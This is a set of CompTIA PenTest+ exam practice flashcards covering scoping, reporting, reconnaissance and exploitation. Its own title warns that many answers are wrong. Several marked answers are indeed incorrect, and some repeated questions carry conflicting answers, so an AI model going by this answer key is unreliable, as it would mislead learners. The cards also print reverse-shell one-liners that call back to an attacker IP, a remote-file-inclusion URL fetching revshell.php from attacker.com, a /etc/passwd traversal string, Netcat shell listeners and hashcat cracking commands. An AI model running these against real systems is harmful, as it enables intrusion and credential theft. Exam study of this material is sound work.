****DO NOT USE*** SO MANY INCORRECT ANSWERS ARE PROVIDED CompTIA Pentest PT0-001 (Exam Boost) Exam 1 Flashcards
A penetration tester has performed a security assessment for a startup firm.
The report lists a total of ten vulnerabilities, with five identified as critical.
The client does not have the resources to immediately remediate all vulnerabilities.
Under such circumstances, which of the following would be the BEST suggestion for the client?
A.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then re-prioritize remediation
B.Identify the issues that can be remediated most quickly and address them first
C.Implement the least impactful of the critical vulnerability remediations first and then address the other critical vulnerabilities
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over an extended period of time
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over an extended period of time
Which of the following is the reason why a pentester would run the following command at the end of an engagement?
A.To remove the persistence
B.To enable persistence
C.To report persistence
D.To check for persistence
A.To remove the persistence
A pentester wants to target NetBIOS name service.
Which of the following is the MOST Likely command to exploit the NetBIOS name service?
A.arpspoof
B.nmap
C.responder
D.burpsuite
A.arpspoof
A security consultant receives a document outlining the scope of an upcoming pentest.
This document contains IP addresses and times that each can be scanned.
Which of the following would contain this information?
A.Rules of Engagement
B.Request for Proposal
C.Master Service Agreement
D.Business Impact Analysis
A.Rules of Engagement
A pentester was able to enter SQL injection commands into a text box and gain access to the information stored on the database.
Which of the following is the best recommendation that would mitigate the vulnerability?
A.Randomize the credentials used to log in.
B. Install host-based intrusion detection
C.Implement input normalization
D.Perform system hardening
C.Implement input normalization
Which of the following tools would a pentester use to conduct OSINT?
A.Shodan
B.SET
C.BeEF
D.Wireshark
E.Maltego
F.Dynamo
A.Shodan
E.Maltego
A pentester is performing ARP spoofing against a switch.
Which of the following should the pentester spoof to get the most information?
A.MAC address of the client
B.MAC address of the Domain Controller
C.MAC address of the web server
D.MAC address of the gateway
D.MAC address of the gateway
A pentester is able to move laterally throughout the domain with minimal roadblocks after compromising a single workstation.
Which of the following mitigation strategies would be BEST to recommend in the report?
(SELECT THREE)
A.Randomize local administrator credentials for each machine.
B.Disable remote logons for local administrators
C.Require multifactor authentication for all logins
D.Increase minimum password complexity requirements
E.Apply additional network access control
F.Enable Full-Disk Encryption on every workstation
G.Segment each host into its own VLAN
D.Increase minimum password complexity requirements
C.Require multifactor authentication for all logins
E.Apply additional network access control
A security consultant is trying to attack a device with a previously identified user account.
The consultant is utilizing Metasploit SMB vulnerabilities and is able to dump hashes.
Which of the following types of attacks is being executed?
A.Credential Dump Attack
B.DLL Injection Attack
C.Reverse Shell Attack
D.Pass the hash attack
A.Credential Dump Attack
During a web application assessment, a pentester discovers that arbitrary commands can be executed on the server.
Wanting to take this attack one step further, the pentester begins to explore ways to gain a reverse shell back to the attack machine at 192.168.1.5.
Which of the following are possible ways to do so?
(CHOOSE TWO)
A.nc 192.168.1.5 44444
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/f
D.nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444 >/tmp/f
F.rm /tmpf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/
Which of the following commands starts the Metasploit database?
A.msfconsole
B.workspace
C.msfvenom
D.db_init
E.db_connect
A.msfconsole
A pentester is in the process of writing a report that outlines the overall level of risk to operations.
In which of the following areas of the report should the penetration tester put this?
A.Appendixes
B.Executive Summary
C.Technical Summary
D.Main Body
B.Executive Summary
A pentester identifies the following findings during an external vulnerability scan:
Vulnerability:
Multiple unsupported version of Apache found (Ports 80, 443)
SSLv3 accepted on HTTPS connections (443)
Mod_rewrite enabled on Apache servers (80,443)
Windows Server 2012 Host Found (21)
A.Obsolete software may contain exploitable components
B.Weak password management practices may be employed
C.Cryptographically weak protocols may be intercepted
D.Web server configurations may reveal sensitive information
D.Web server configurations may reveal sensitive information
Which of the following types of intrusion techniques is the use of an under-the-door tool during a physical security assessment an example of?
A.Lockpicking
B.Egress sensor triggering
C.Lock bumping
D.Lock bypass
D.Lock bypass
During a test, a critical vulnerability is discovered on a client's core server.
Which of the following should be the next action?
A.Disable the network port of the affected service
B.Complete all findings, and then submit them to the client
C.Promptly alert the client with details of the finding
D.Take the target offline so it cannot be exploited by an attacker
C.Promptly alert the client with details of the finding
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic.
The next step the pentester wants to take is to capture all the victim web traffic unencrypted.
Which of the following would meet this goal?
A.Perform an HTTP downgrade attack
B.Harvest the user credentials to decrypt traffic
C.Perform a MITM attack
D.Implement a CA attack by impersonating trusted CAs
A.Perform an HTTP downgrade attack
A pentester wants to script out a way to discover all the PTR records for a range of IP addresses.
Which of the following is the MOST efficient to utilize?
A.nmap -p 53 -oG dnslist.txt | cut -d ";" -f4
B.nslookup -ns 8.8.8.8 << dnslist.txt
C.for x in {1..254}; do dig -x 192.168.$x.$x;done
D.dig -r > echo "8.8.8.8" >> /etc/resolv.conf
D.dig -r > echo "8.8.8.8" >> /etc/resolv.conf
An engineer, who is conducting a pentest for a web application, discovers the user login process sends data using the HTTP get method.
To mitigate the risk of exposing sensitive information, the form should be sent using an:
A.HTTP POST method
B.HTTP OPTIONS method
C.HTTP PUT method
D.HTTP TRACE method
A.HTTP POST method
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled 'changepass':
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using strings to print the ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%S/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path to exploitation to achieve root privileges on the machine?
A.Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
B.Create a copy of changepass in the same directory naming it changepw. Export the ENV_PATH environment variable to the path ‘/home/user’. Then run changepass
C.Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application
D.Stop external calls from the application
A pentester is performing a remote scan to determine if the server farm is compliant with the company's software baseline.
Which of the following should the pentester perform to verify compliance with the baseline?
A.Discovery Scan
B.Stealth Scan
C.Full Scan
D.Credentialed Scan
D.Credentialed Scan
A pentester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department.
Afterward, the pentester obtained hashes over the VPN and easily cracked them with a dictionary attack.
Which of the following remediation steps should be recommended? (SELECT THREE)
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
C.Install an Intrusion Prevention System
D.Increase Password Complexity
E.Install a security information event monitoring system
F.Prevent members of the IT department from interactively logging in as administrators
G.Upgrade the cipher suite used for the VPN solution
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
D.Increase Password Complexity
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application
B.Block URL Redirections
In which of the following scenarios would a tester perform a Kerberoasting attack?
A.The tester has compromised a Windows device and dumps the LSA secrets
B.The tester needs to retrieve the SAM database and crack the password hashes
C.The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement
D.The tester has compromised an account and needs to dump hashes and plaintext passwords from the system
C.The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement
A pentester is reviewing the following output from a wireless sniffer:
ESSID BSSID Encryption Channel WPS
Guest AD:1F:AB:10:33:78 OPEN 6 N
Secure AD:1F:AB:10:33:79 WPA2-PSK 6 N
Dev AD:1F:AB:10:33:70 WPA2-ENT 11 N
A.Hardware Vendor
B.Channel Interface
C.Usernames
D.Key Strength
C.Usernames
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A.HKEY_CLASSES_ROOT
B.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_CURRENT_CONFIG
C.HKEY_CURRENT_USER
A pentester is preparing to conduct API testing.
Which of the following would be MOST helpful in preparing for this engagement?
A.Nikto
B.WAR
C.W3AF
D.Swagger
D.Swagger
During an internal network pentest, a tester recovers the NTLM password hash for a user known to have full admin privileges on a number of target systems.
Efforts to crack the hash and recover the plaintext password have been unsuccessful.
Which of the following would be the BEST target for continued exploitation efforts?
A.Windows 7 (Ports 23, 161)
B.Windows Server 2016 (Ports 53, 5900)
C.Windows 8.1 Open (Ports 445, 3389)
D.Windows 8 (Ports 514, 3389)
A.Windows 7 (Ports 23, 161)
A pentester delivers a web application vulnerability scan report to a client.
The pentester rates a vulnerability as medium severity.
The same vulnerability was reported as a critical finding on the previous report.
Which of the following is the most likely reason for the reduced severity?
A.The client has applied a hot fix without updating the version
B.The threat landscape has significantly changed
C.The client updated their codebase with new features
D.There are currently no known exploits for this vulnerability
A.The client has applied a hot fix without updating the version
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the CEO logs in, to obtain the CEO's login credentials.
A.Elicitation attack
B.Impersonation attack
C.Spear phishing
D.Drive-by download attack
C.Spear phishing
A pentester is scanning a network for SSH and has a list of provided targets.
Which of the following nmap commands should the tester use?
A.nmap -p 22 -iL targets
B.nmap -p 22 -sL targets
C.nmap -p 22 -oG targets
D.nmap -p 22 -oA targets
A.nmap -p 22 -iL targets
A pentester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
A.nc -l -p 4444 /bin/bash
B.nc -vp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -lp 4444 /bin/bash
D.nc -lp 4444 /bin/bash
A pentester has been assigned to perform an external pentest assessment of a company.
Which of the following would BEST help with passive information gathering?
A.Wait outside the company’s building and attempt to tailgate behind an employee
B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access
C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications
D.Search social media for information technology employees who post information about the tech they work with
E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications
A client asks a pentester to add more addresses to a test currently in progress.
Which of the following would define the target list?
A.Rules of engagement
B.Master Service Agreement
C.Statement of Work
D.End-User License Agreement
C.Statement of Work
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a pentest?
A.Pentest findings often contain intellectual property
B.Pentest findings could lead to consumer dissatisfaction if made public
C.Pentest findings are legal documents containing privileged information
D.Pentest findings can assist an attacker in compromising a system
D.Pentest findings can assist an attacker in compromising a system
A pentester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
A.nc -l -p 4444 /bin/bash
B.nc -vp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -lp 4444 /bin/bash
A.nc -l -p 4444 /bin/bash
A pentester has been assigned to perform an external pentest assessment of a company.
Which of the following would BEST help with passive information gathering? (Choose two)
A.Wait outside the company’s building and attempt to tailgate behind an employee
B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access
C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications
D.Search social media for information technology employees who post information about the tech they work with
E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications
D.Search social media for information technology employees who post information about the tech they work with
A software development team recently migrated to new application software on the on-premise environment.
Pentest findings show that multiple vulnerabilities exist.
If a pentester does not have access to a live or test environment, it might be better to recreate the same environment on a VM.
Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration
D.Misconfiguration
A pentester is checking a script to determine why some basic math errors are persisting.
The expected result was the program outputting “True”.
root:~# cat ./test.sh
#!/bin/bash
source=10
let dest5=5
if ['source' = 'dest' ] ; then
echo "True"
else
echo "False"
fi
#End of File
Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose Two)
A.Change ‘fi’ to ‘Endli’
B.Remove the ‘let’ in front of ‘dest=5+5’
C.Change the ‘=’ to ‘eq’
D.Change source and dest to “$source” and”$dest”
E.Change ‘else’ to ‘elif’
C.Change the ‘=’ to ‘eq’
E.Change ‘else’ to ‘elif’
After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable.
The client claims to have been billed unfairly.
Which of the following documents would most likely be able to provide guidance in such a situation?
A.SOW
B.NDA
C.EULA
D.BPA
A.SOW
A software development team recently migrated to new application software on the on-premise environment.
Pentest findings show that multiple vulnerabilities exist.
If a pentester does not have access to a live or test environment, it might be better to recreate the same environment on a VM.
Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration
A.Unsecure service and protocol configuration
A tester has captured a NetNTLMv2 hash using Responder.
Which of the following commands will allow the tester to crack the hash using a mask attack?
A.hashcat -m 5600 -r rule/bestG4.rule hash.txt wordlist.txt
B.hashcat -m 5600 hash.txt
C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?
D.hashcat -m 5600 -o results.text hash.txt wordlist.txt
C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?
A pentester has run the following Nmap scan on a computer:
'nmap -aV 192.168.1.5'
The organization said it had disabled telnet in its environment.
However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.
Which of the following is the BEST explanation for what happened?
A.The organization failed to disable Telnet
B.Nmap results contain a false positive for port 23
C.Port 22 was filtered
D.The service is running on a non-standard port
D.The service is running on a non-standard port
Which of the following has a direct and significant impact on the budget of the security assessment?
A.Scoping
B.Scheduling
C.Compliance requirement
D.Target Risk
A.Scoping
During an internal pentest, several multicast and broadcast name resolution requests are observed traversing the network.
Which of the following tools could be used to impersonate network resources and collect authentication requests?
A.Ettercap
B.Tcpdump
C.Responder
D.Medusa
A.Ettercap
Given the following URL:
http://example.com/download.php?id=../../../etc/passwd
Which of the following best describes the above attack?
A.Malicious file upload attack
B.Redirect attack
C.Directory traversal attack
D.Insecure direct object reference attack
C.Directory traversal attack